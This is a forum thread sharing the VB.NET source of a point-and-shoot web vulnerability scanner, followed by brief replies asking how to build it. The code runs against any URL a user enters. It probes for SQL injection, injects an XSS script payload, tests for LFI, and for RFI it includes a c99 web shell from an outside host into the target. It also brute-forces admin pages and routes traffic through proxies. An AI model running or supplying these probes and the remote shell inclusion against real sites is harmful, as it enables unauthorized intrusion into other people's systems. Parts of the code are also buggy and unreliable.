Results 1 to 4 of 4

Thread: Web Vulnerability Scanner Source Code

  1. #1
    Senior Member
    Join Date
    Mar 2013
    Posts
    204
    Rep Power
    5

    Web Vulnerability Scanner Source Code

    YOU NEED VISUAL BASIC!

    Code:
    Imports System.Net
    
    Public Class Form1
        Public Proxystr As String
        Public versione As Decimal = 0.01
        Public sub_version As String = "Alpha Release"
        Public messaggio As String
        Public titolo As String
        Private Sub Cross_Threading() Handles Me.Load
    
            Control.CheckForIllegalCrossThreadCalls = False ' :'(
    
        End Sub
       
        Private Sub Thief3Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button1.Click
            If Site_Info.siteUp(TextBox1.Text & TextBox2.Text) = True Then
                Dim thread_ As New System.Threading.Thread(AddressOf Scan_Vln)
                thread_.Start()
            Else
                Showmsg("Web site doesn't exist", "Warning")
            End If
    
        End Sub
    
        Private Sub Scan_Vln()
            Thief3Button1.Text = "Attendere..."
            DroneProgressBar1.Maximum = 10
            DroneProgressBar1.Value = 0
            Dim Url As String = TextBox1.Text & TextBox2.Text
    
            Application.DoEvents()
            If SQL_Injection_Scanner.vulnerabile(Url) = True Then
                Label2.Text = "Sql Injection - Vulnerabile"
                Label2.ForeColor = Color.Red
            Else
                Label2.Text = "Sql Injection - Non Vulnerabile"
                Label2.ForeColor = Color.Green
            End If
            DroneProgressBar1.Value = 2
            Application.DoEvents()
    
            If Rfi_Scanner.Vulnerabile(Url, "http://www.sh3ll.org/c99.txt") = True Then
                Label3.Text = "Rfi - Vulnerabile"
                Label3.ForeColor = Color.Red
            Else
                Label3.Text = "Rfi - Non Vulnerabile"
                Label3.ForeColor = Color.Green
            End If
            DroneProgressBar1.Value = 4
            Application.DoEvents()
            If Lfi_Scanner.Vulnerabile(Url) = True Then
                Label4.Text = "Lfi - Vulnerabile"
                Label4.ForeColor = Color.Red
            Else
                Label4.Text = "Lfi - Non Vulnerabile"
                Label4.ForeColor = Color.Green
            End If
            DroneProgressBar1.Value = 6
            Application.DoEvents()
            If Xss_Scanner.Vulnerabile(Url) = True Then
                Label5.Text = "Xss - Vulnerabile"
                Label5.ForeColor = Color.Red
            Else
                Label5.Text = "Xss - Non Vulnerabile"
                Label5.ForeColor = Color.Green
            End If
            DroneProgressBar1.Value = 8
            Application.DoEvents()
            If WebDav_Scanner.Vulnerabile(TextBox1.Text) = True Then
                Label6.Text = "WebDav - Vulnerabile"
                Label6.ForeColor = Color.Red
            Else
                Label6.Text = "WebDav - Non Vulnerabile"
                Label6.ForeColor = Color.Green
            End If
    
            DroneProgressBar1.Value = 10
            Thief3Button1.Text = "Scan"
            Application.DoEvents()
    
    
        End Sub
    
        Private Sub Thief3Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button2.Click
            Admin_Page_Finder.Show()
        End Sub
        Private Sub Rimuovi_Finestra() Handles Me.Load
            Thief3Theme1.Text = Thief3Theme1.Text & " - " & sub_version
            Me.FormBorderStyle = Windows.Forms.FormBorderStyle.None
        End Sub
    
        Private Sub Thief3Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button3.Click
            Proxy_Checher.Show()
        End Sub
        Private Sub Thief3Button4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button4.Click
            About.Show()
        End Sub
        Public Sub Showmsg(ByVal text As String, ByVal titoloa As String) ' Message Box Personalizzata ;)
            messaggio = text
            titolo = titoloa
            msg.Show()
        End Sub
      
        Private Sub DroneButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton2.Click
            Me.Close()
        End Sub
         
    End Class
    
    Public Class Proxy
    
        Shared Function Get_Proxy(ByVal url As String) As System.Net.WebProxy
            Return New System.Net.WebProxy(url)
        End Function
    End Class
    Public Class SQL_Injection_Scanner
      
        Shared Function vulnerabile(ByVal link As String) As Boolean
            Try
    
                If Not link.Contains("=") Then
                    Return False
                Else
                    Dim WC As New System.Net.WebClient
                    If Form1.Proxystr <> Nothing Then
                        WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
                    End If
                    Dim Source As String = WC.DownloadString(link.Replace("=", "='"))
                    If Source.Contains("You have an error in your SQL syntax") Or Source.Contains("Fatal error") Or Source.Contains("Warning") Then
                        Return True
                    Else
                        Return False
                End If
                End If
            Catch ex As Exception
                Return False
                Form1.Showmsg(ex.Message, "Errore")
            End Try
    
        End Function
    End Class
    Public Class Xss_Scanner
        Shared Function Vulnerabile(ByVal link As String) As Boolean
            Dim WC As New System.Net.WebClient
            If Form1.Proxystr <> Nothing Then
                WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
            End If
            For i = 0 To link.Split(vbNewLine).Length - 1
                Dim Source As String = WC.DownloadString(link.Split(vbNewLine)(i).Trim.Split("=")(i) & "=" & Chr(34) & "><script>alert('XSS_SUCCESSFUL')</script>")
                If Source.Contains("<script>alert('XSS_SUCCESSFUL')</script>") And Not Source.Contains("You have an error in your SQL syntax") Then
                    Return True
                    Exit For
                Else
                    Return False
                End If
            Next
        End Function
    End Class
    Public Class WebDav_Scanner
        Shared Function Vulnerabile(ByVal link As String) As Boolean
    
            Try
    
                Dim WC As New System.Net.WebClient
                If Form1.Proxystr <> Nothing Then
                    WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
                End If
                Dim s As String = "http://" & link & "/webdav/"
                Dim request As System.Net.HttpWebRequest = DirectCast(System.Net.WebRequest.Create((s)), System.Net.HttpWebRequest)
                request.Timeout = 5000
                Dim response As System.Net.HttpWebResponse = DirectCast(request.GetResponse, System.Net.HttpWebResponse)
                Dim str As String = New System.IO.StreamReader(response.GetResponseStream).ReadToEnd
                If str.Contains("WebDAV testpage") Then
                    Return True
                Else
                    Return False
                End If
            Catch ex As Exception
                Return False
            End Try
    
        End Function
    End Class
    Public Class Lfi_Scanner
        Shared Function Vulnerabile(ByVal link As String) As Boolean
            Try
                Dim WC As New System.Net.WebClient
                If Form1.Proxystr <> Nothing Then
                    WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
                End If
                For i = 0 To link.Split(vbNewLine).Length - 1
                    Dim v As String = link.Split(vbNewLine)(i).Trim.Split("=")(0) & "=../"
                    If v.Contains("=") Then
                        Dim Source As String = WC.DownloadString(v)
                        If Source.Contains("No such file or directory") Then
                            Return True
                        Else
                            Return False
                        End If
                    End If
                Next
            Catch ex As Exception
    
            End Try
    
        End Function
    End Class
    
    Public Class Rfi_Scanner
        Shared Function Vulnerabile(ByVal link As String, ByVal SHELL_URL As String) As Boolean
            Try
                Dim WC As New System.Net.WebClient
                If Form1.Proxystr <> Nothing Then
                    WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
                End If
                For i = 0 To link.Split(vbNewLine).Length - 1
                    Dim v As String = link.Split(vbNewLine)(i).Trim.Split("=")(0) & "=" & SHELL_URL & "?"
                    If v.Contains("=") Then
                        Dim Source As String = WC.DownloadString(v)
                        If Source.Contains("RFI_SUCCESSFUL") And Not Source.Contains("$invulnerable") And Source.Length > 20 Then
                            Return True
                        Else
                            Return False
                        End If
    
                    End If
                Next
            Catch ex As Exception
                Form1.Showmsg(ex.Message, "Errore")
                Return False
            End Try
    
        End Function
    End Class
    
    Public Class Site_Info
        Shared Function siteUp(ByVal url As String) As Boolean
            Dim result As Boolean = False
            Try
                Dim request As HttpWebRequest = DirectCast(HttpWebRequest.Create(url), HttpWebRequest)
                request.Credentials = DirectCast(CredentialCache.DefaultCredentials, NetworkCredential)
                request.Method = "HEAD" ' anche GET ma pi? lento 
                Using response As HttpWebResponse = DirectCast(request.GetResponse(), HttpWebResponse)
                    result = Not (response Is Nothing OrElse response.StatusCode <> HttpStatusCode.OK)
                End Using
            Catch e As Exception
                result = False
            End Try
            Return result
        End Function
    End Class
    Public Class Proxy_Checker
        Shared Function Proxy_Ok(ByVal proxy As String, Optional ByVal Test_Site As String = "http://www.google.com") As Boolean
            Dim wc As New System.Net.WebClient
            Try
                wc.Proxy = New System.Net.WebProxy(proxy)
                wc.OpenRead(Test_Site)
                Return True
            Catch
                Return False
            End Try
        End Function
    
    
    End Class
    
    
    
    
    
    
    Imports System.Net
    Imports System.IO
    Public Class Admin_Page_Finder
        Dim Pagine_ToT As Integer
        Dim Pagine_Controllate As Integer
        Dim Dork_Lst As New ListBox
        Private Sub Scarica_Dork()
            TextBox2.Text = Form1.TextBox1.Text
            Pagine_ToT = -1
            If IO.File.Exists("Admin.txt") Then
                IO.File.Delete("Admin.txt")
            End If
            My.Computer.Network.DownloadFile("http://server4project.altervista.org/Programmi/Web%20Vulnerability%20Scanner/Admin.txt", "Admin.txt") ' File contente pagine admin
            Dim oFile As System.IO.File
            Dim oRead As System.IO.StreamReader
    
            Try
                oRead = oFile.OpenText("Admin.txt")
    
                While oRead.Peek <> -1
                    Dork_Lst.Items.Add(oRead.ReadLine())
                    Pagine_ToT += 1
                End While
    
            Catch ex As Exception
    
            Finally
                oRead.Close()
            End Try
            Dim T
            For i = 0 To Dork_Lst.Items.Count - 1
                T = T & Dork_Lst.Items.Item(i).ToString() & vbCrLf
            Next
            '       IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Desktop & "\T.txt", T)     salva il risultato in un file di testo
        End Sub
    
        Sub Scan_For_Page()
            DroneProgressBar1.Maximum = Pagine_ToT
            DroneProgressBar1.Value = 0
            Pagine_Controllate = 0
            ListBox2.Items.Clear()
            For i = 0 To Dork_Lst.Items.Count - 1
                Dork_Lst.SelectedIndex = i
                Dim sito As String = TextBox2.Text & Dork_Lst.SelectedItem
    
                If Site_Info.siteUp(sito) = True Then
                    ListBox2.Items.Add(sito)
                End If
    
                Pagine_Controllate += 1
                Label1.Text = i & " / " & Pagine_ToT & "   |   " & Dork_Lst.SelectedItem
                DroneProgressBar1.Value = Pagine_Controllate
                Application.DoEvents()
            Next
            If ListBox2.Items.Count = 0 Then
                ListBox2.Items.Add("Nessun Risultato")
            End If
            Thief3Button2.Text = "Scan"
        End Sub
        Dim th As Threading.Thread
        Private Sub Thief3Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button2.Click
    
            If Thief3Button2.Text = "Scan" Then
                Dim t As New Threading.Thread(AddressOf Scan)
                t.Start()
                th = t
                Thief3Button2.Text = "Stop"
            Else
                th.Abort()
                Thief3Button2.Text = "Scan"
            End If
           
        End Sub
        Private Sub Scan()
    
            If TextBox2.Text.EndsWith("/") = True Then
                Scan_For_Page()
            Else
                Form1.Showmsg("Url invalido", "Attenzione")
            End If
        End Sub
        Private Sub loadd() Handles Me.Load
            Control.CheckForIllegalCrossThreadCalls = False ' :'(
            Scarica_Dork()
        End Sub
    
        Private Sub ListBox2_DoubleClick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ListBox2.DoubleClick
            If Not ListBox2.SelectedItem = Nothing And Not ListBox2.SelectedItem = "Nessun Risultato" Then
                Process.Start(ListBox2.SelectedItem)
            End If
        End Sub
    
        Private Sub Thief3Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs)
            If Site_Info.siteUp(TextBox2.Text) Then
                TextBox2.ForeColor = Color.Green
            Else
                TextBox2.ForeColor = Color.Red
            End If
        End Sub
        Private Sub Rimuovi_Finestra() Handles Me.Load
            Me.FormBorderStyle = Windows.Forms.FormBorderStyle.None
        End Sub
    
        Private Sub DroneButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton1.Click
            Me.Close()
        End Sub
    
       Private Sub ico() Handles Me.Load
            Me.Icon = Form1.Icon
        End Sub
    End Class
    
    
    
    
    
    
    
    
    Public Class msg
    
        Private Sub DroneButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton1.Click
            Me.Close()
        End Sub
    
        Private Sub hs() Handles Me.Load
            Label1.Text = Form1.messaggio
            DroneTheme1.Text = Form1.titolo
            Me.TopMost = True
            resizec()
        End Sub
    
        Private Sub resizec() Handles Me.HandleCreated
            While Label1.Bounds.IntersectsWith(DroneSeperator1.Bounds)
                Me.Size = New Size(Me.Size.Width + 10, Me.Size.Height)
            End While
    
        End Sub
         
    End Class
    
    
    
    
    
    
    Public Class Proxy_Checher
        Private Sub Carica() Handles Me.Load
            Control.CheckForIllegalCrossThreadCalls = False
        End Sub
        Dim t As Threading.Thread
        Private Sub Thief3Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button1.Click
            If Thief3Button1.Text = "Check" Then
                Label2.Text = "Attendere..."
                Thief3Button1.Text = "Stop"
                Dim th As New System.Threading.Thread(AddressOf Check)
                t = th
                th.Start()
                Application.DoEvents()
            Else
                t.Abort()
                Label2.Text = "Processo Interrotto"
                Thief3Button1.Text = "Check"
            End If
    
        End Sub
        Sub Check()
            Dim Test As New Stopwatch
                Test.Start()
                If Proxy_Checker.Proxy_Ok(TextBox1.Text) = True Then
                    Test.Stop()
                Label2.Text = TextBox1.Text & " - Funzionante - " & Test.ElapsedMilliseconds & " ms"
                    Label2.ForeColor = Color.Green
            Else
                Label2.Text = TextBox1.Text & " - Non Funzionante"
                Label2.ForeColor = Color.Red
                Test.Stop()
                End If
                Thief3Button1.Text = "Check"
        End Sub
    
    
        Private Sub Thief3Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button3.Click
            Form1.Proxystr = TextBox1.Text
        End Sub
     Private Sub Rimuovi_Finestra() Handles Me.Load
            Me.FormBorderStyle = Windows.Forms.FormBorderStyle.None
        End Sub
        Private Sub DroneButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton1.Click
            Me.Close()
        End Sub
        Private Sub ico() Handles Me.Load
            Me.Icon = Form1.Icon
        End Sub
         
        Private Sub Thief3Theme1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Theme1.Click
    
        End Sub
    End Class

    The Best VPN!
    VVV Click Below VVV


  2. #2
    I'm Batman!
    Join Date
    Mar 2013
    Location
    Wayne Manor
    Posts
    159
    Rep Power
    5
    So what is this exactly for? And what is the source?

    The Best VPN!
    VVV Click Below VVV


  3. #3
    What all buttons do we need to add to get this working?

  4. #4
    New member
    Join Date
    Sep 2013
    Posts
    1
    Rep Power
    0
    Thanks, for posting!
    Looks, good the coding.

    But, what do we need to add?

    You're only giving us the source code! :$

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •